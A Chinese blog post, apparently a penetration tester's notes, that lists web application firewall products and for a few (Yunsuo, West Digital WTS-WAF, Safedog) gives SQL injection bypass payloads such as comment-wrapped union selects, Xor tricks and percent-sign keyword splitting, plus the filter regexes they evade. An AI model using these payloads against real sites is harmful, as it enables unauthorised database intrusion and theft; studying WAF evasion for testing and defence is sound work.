WAF的识别与绕过思路 - 302

WAF总结

渗透过程中总会遇到各种各样的WAF，为了方便以后查找资料，先对此进行一些总结。

360网站卫士

Naxsi WAF

云锁v3.1.18.13
Xor绕过
Xor 1=1，Xor 1=2绕过

过滤规则

/**/替换为空

/*!*/替换为空

匹配的关键有:and,or,updatexml,select xxx from,union xxx select

匹配select xx from的正则应该是:select .*? from

匹配union xx select的正则应该是:union .*? select

360主机卫士或360webscan

OpenRASP

腾讯宙斯盾

SDWAF

长亭SafeLine

DotDefender

UPUPW

网防G01

F5 BIG-IP

西部数码WTS-WAF

加号替换空格绕过
bypass：id=1 an%d 1=2    只需要在关键词中加%即可绕过

西部数码云网盾

安全狗v4.0.26550
Xor绕过
Xor 1=1，Xor 1=2绕过

/*/*替换空格绕过
/*/*and/*/*1=2

if 也不拦截

%23a%0a也可以    %23表示#    %0a表示换行

union /*!01344select*/ 1,2,3%23绕过

安全狗不拦截/**/之间的内容
bypass：index.php?a=/*&id=1 and 1=2 union select version(),2,3%23*/

过滤规则

会拦截一些关键函数，如user()，databse()

&&替换and绕过，like替换=绕过。

Mod_Security

奇安信网站卫士

铱讯WAF

未知云WAF

可能存在waf（攻击包被丢弃）

本博客所有文章除特别声明外，均采用 CC BY-SA 4.0 协议，转载请注明出处！

WAF的识别与绕过思路

WAF总结

360网站卫士

Naxsi WAF

360主机卫士或360webscan

OpenRASP

腾讯宙斯盾

长亭SafeLine

DotDefender

UPUPW

网防G01

F5 BIG-IP

西部数码WTS-WAF

西部数码云网盾

Mod_Security

奇安信网站卫士

铱讯WAF

可能存在waf（攻击包被丢弃）

Recommend

增长黑客（2）：10个月时间，CMO如何挽救这家破产的电商巨头？

VC刹车：4个月，没投一个项目

电子屏显示车祸死亡数以警示司机安全驾驶，可能适得其反

自然语言处理系列（6）：TextCNN

PE结构-PE文件的两种状态

PHP面试知识点

Java安全--RMI基础学习

Introduction to Behat and Behaviour Driven Development

淮阴工学院数理学院应用物理专业青年教师，于彦龙，不当署名学术不端，利用科研经费和...

3.Create medusa transaction step by step

About Joyk